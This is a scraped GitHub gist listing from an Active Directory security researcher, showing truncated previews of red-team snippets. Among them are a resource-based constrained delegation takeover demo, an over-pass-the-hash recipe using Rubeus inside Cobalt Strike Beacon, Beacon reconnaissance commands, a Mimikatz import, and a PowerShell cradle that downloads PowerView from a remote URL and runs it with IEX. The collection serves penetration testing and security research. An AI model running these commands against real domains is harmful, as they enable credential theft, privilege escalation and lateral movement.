Skip to content

Instantly share code, notes, and snippets.

💭
geeking out about Kerberos

Will HarmJ0y

💭
geeking out about Kerberos
Block or report user

Report or block HarmJ0y

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active Aug 28, 2019
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Aug 10, 2019
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@HarmJ0y
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
<#
.SYNOPSIS
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Oct 15, 2019
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" - https://www.youtube.com/watch?v=Pq9t59w0mUI
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" - https://www.youtube.com/watch?v=xHkRhRo3l8o
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" - https://www.youtube.com/watch?v=RcDq9GgiUB4
PowerShell Summit 2016 - "Digital Forensics with PowerShell" - https://www.youtube.com/watch?v=gm9A7FaWTkY
BSides LV 2016 - "Building an EmPyre with Python" - https://www.youtube.com/watch?v=79qzgVTP3Yc
DerbyCon 2016 - "A Year in the Empire" - https://www.youtube.com/watch?v=ngvHshHCt_8
@HarmJ0y
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Sep 16, 2019
ConvertFrom-UserParameter.ps1
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
<#
.SYNOPSIS
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
@HarmJ0y
HarmJ0y / 44con_demo.ps1
Created Sep 17, 2016
Demo for the 44con "Trusts You Might Have Missed" presentation
View 44con_demo.ps1
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
Invoke-MapDomainTrust
# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
You can’t perform that action at this time.